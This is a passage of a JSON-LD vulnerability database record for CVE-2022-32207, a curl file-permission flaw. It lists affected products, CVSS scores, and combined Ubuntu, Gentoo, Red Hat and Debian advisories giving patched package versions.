    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202206-1963",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "curl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.84.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "13.0"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "curl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.69.0"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "hci management node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "element software",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "clustered data ontap",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "curl",
        "scope": null,
        "trust": 0.8,
        "vendor": "haxx",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "bootstrap os",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "macos",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c3\u30d7\u30eb",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "168174"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2022-32207",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2022-32207",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-424134",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2022-32207",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2022-32207",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-32207",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-32207",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2022-32207",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202206-2569",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-424134",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-32207",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "When curl \u003c 7.84.0 saves cookies, alt-svc and hsts data to local files, it makes the operation atomic by finalizing the operation with a rename from a temporary name to the final target file name.In that rename operation, it might accidentally *widen* the permissions for the target file, leaving the updated file accessible to more users than intended. curl There is a vulnerability in improper default permissions.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ==========================================================================\nUbuntu Security Notice USN-5495-1\nJune 27, 2022\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n- Ubuntu 21.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. \nAn attacker could possibly use this issue to cause a denial of service. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32205)\n\nHarry Sintonen discovered that curl incorrectly handled certain HTTP compressions. \nAn attacker could possibly use this issue to cause a denial of service. \n(CVE-2022-32206)\n\nHarry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207)\n\nHarry Sintonen discovered that curl incorrectly handled certain FTP-KRB messages. \nAn attacker could possibly use this to perform a machine-in-the-diddle attack. \n(CVE-2022-32208)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\n  curl                            7.81.0-1ubuntu1.3\n  libcurl3-gnutls                 7.81.0-1ubuntu1.3\n  libcurl3-nss                    7.81.0-1ubuntu1.3\n  libcurl4                        7.81.0-1ubuntu1.3\n\nUbuntu 21.10:\n  curl                            7.74.0-1.3ubuntu2.3\n  libcurl3-gnutls                 7.74.0-1.3ubuntu2.3\n  libcurl3-nss                    7.74.0-1.3ubuntu2.3\n  libcurl4                        7.74.0-1.3ubuntu2.3\n\nUbuntu 20.04 LTS:\n  curl                            7.68.0-1ubuntu2.12\n  libcurl3-gnutls                 7.68.0-1ubuntu2.12\n  libcurl3-nss                    7.68.0-1ubuntu2.12\n  libcurl4                        7.68.0-1ubuntu2.12\n\nUbuntu 18.04 LTS:\n  curl                            7.58.0-2ubuntu3.19\n  libcurl3-gnutls                 7.58.0-2ubuntu3.19\n  libcurl3-nss                    7.58.0-2ubuntu3.19\n  libcurl4                        7.58.0-2ubuntu3.19\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: curl: Multiple Vulnerabilities\n     Date: December 19, 2022\n     Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n       ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/curl              \u003c 7.86.0                    \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: curl security update\nAdvisory ID:       RHSA-2022:6157-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:6157\nIssue date:        2022-08-24\nCVE Names:         CVE-2022-32206 CVE-2022-32207 CVE-2022-32208\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: HTTP compression denial of service (CVE-2022-32206)\n\n* curl: Unpreserved file permissions (CVE-2022-32207)\n\n* curl: FTP-KRB bad message verification (CVE-2022-32208)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\ncurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-devel-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\n\nppc64le:\ncurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-devel-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\n\ns390x:\ncurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-devel-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\n\nx86_64:\ncurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm\ncurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.i686.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-devel-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-devel-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 9):\n\nSource:\ncurl-7.76.1-14.el9_0.5.src.rpm\n\naarch64:\ncurl-7.76.1-14.el9_0.5.aarch64.rpm\ncurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm\ncurl-minimal-7.76.1-14.el9_0.5.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-minimal-7.76.1-14.el9_0.5.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm\n\nppc64le:\ncurl-7.76.1-14.el9_0.5.ppc64le.rpm\ncurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm\ncurl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm\n\ns390x:\ncurl-7.76.1-14.el9_0.5.s390x.rpm\ncurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.s390x.rpm\ncurl-minimal-7.76.1-14.el9_0.5.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-minimal-7.76.1-14.el9_0.5.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm\n\nx86_64:\ncurl-7.76.1-14.el9_0.5.x86_64.rpm\ncurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm\ncurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.i686.rpm\ncurl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm\ncurl-minimal-7.76.1-14.el9_0.5.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-minimal-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-minimal-7.76.1-14.el9_0.5.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32207\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYwZpA9zjgjWX9erEAQjorQ/9G7KqpJrOkRXFM3iFlTVnUV/mGwdu4v5p\ndru+hce/7sEETk1Er9JXSBIZvtCk31V7QxswgIpgAwCBX/Ie/wr+tosF3jE+4YjL\nMCgtbk5Tzuak49Gsggz40GbvauEm3NiSyLPmG+A+tWrjqst3UWwobirEg7iVGUU1\nOOWKhNPzAr0iWoY1z2EBvBl23Fo8gaMYX9dd8dhcGza2OVMwzywrNW69h6bsQhDp\nY5nAyBBCvwosqmDdIzZV5vDQEWoxb5uP+jnRgwtgJpaqdsn+ULkDuShIQZGntdA5\nfSCM57aSEmOY0bx/fE3/Z1b8Si3+GJ+j688rSlcRwlaA+Bxo5Az+PUbe4eWwTc2B\nvstfKWZHPLv/nyq+1JjV7/e+cuwAkn9YsT3/TUPlLtGjmg1x+4wytRXEF3uipFZR\nP5TJGLIlvaQbnpNfVfkxefCvvGRuomILaP12rRYuKuI1CR+jRLu3jEmFfoSyJs/q\nWR9OXuSQEFjTmLo3m8S7iRLN6bUWKItYhNmaSucZRgCvayT5BY54GbbssIAykQX8\nzLXIbqHQJec8sJuIdSwDSAuxyhrq30kSk0WLpfkK/uw179XpUphNK9CHL7VnGiVj\nhaaef/yP7L12NBguJBmUnYWaWwa3sqepNQ3D8RQYXHrOmQ38VOjL76RQ0URYPkSB\npl2iagecnP0=fQUi\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. These flaws may allow remote attackers to obtain sensitive\ninformation, leak authentication or cookie header data or facilitate a\ndenial of service attack. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 7.74.0-1.3+deb11u2. \n\nWe recommend that you upgrade your curl packages. \n\nFor the detailed security status of curl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/curl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmLoBaNfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeTf9A//VWkco2gxCMMe8JDcL9sLD0B5L8KGRxbPBYmpE1l2kCpiW9QGVwCN3q2K\ni8xo0jmRxSwSXDmAE17aTtGT66vU8vQSHewty031TcvWKBoAJpKRTbazfdOy/vDD\nwaofTEaUClFt3NNiR3gigRU6OFV/9MWlUWwCJ/Wgd5osJTQCyWV/iHz3FJluc1Gp\nrXamYLnWGUJbIZgMFEo7TqIyb91P0PrX4hpnCcnhvY4ci5NWOj2qaoWGhgF+f9gz\nUao91GTOnuTyoY3apKzifdO5dih9zJttnRKUgHkn9YCGxanljoPjHRYOavWdN6bE\nyIpT/Xw2dy05Fzydb73bDurQP+mkyWGZA+S8gxtbY7S7OylRS9iHSfyUpAVEM/Ab\nSPkGQl6vBKr7dmyHkdIlbViste6kcmhQQete9E3tM18MkyK0NbBiUj+pShNPC+SF\nREStal14ZE+DSwFKp5UA8izEh0G5RC5VUVhB/jtoxym2rvmIamk5YqCS1rupGP9R\n1Y+Jm8CywBrKHl5EzAVUswC5xDAArWdXRvrgHCeElnkwuCwRC8AgRiYFFRulWKwt\nTV5qveehnzSc2z5IDc/tdiPWNJhJu/blNN8BauG8zmJV4ZhZP9EO1FCLE7DpqQ38\nEPtUTMXaMQR1W15He51auBQwJgSiX1II+5jh6PeZTKBKnJgLYNA=\n=3E71\n-----END PGP SIGNATURE-----\n. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.51, and includes bug fixes and enhancements, which\nare documented in the Release Notes document linked to in the References. After installing the updated packages, the\nhttpd daemon will be restarted automatically",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "168174"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-32207",
        "trust": 4.0
      },
      {
        "db": "HACKERONE",
        "id": "1573634",
        "trust": 2.6
      },
      {
        "db": "PACKETSTORM",
        "id": "168174",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "167607",
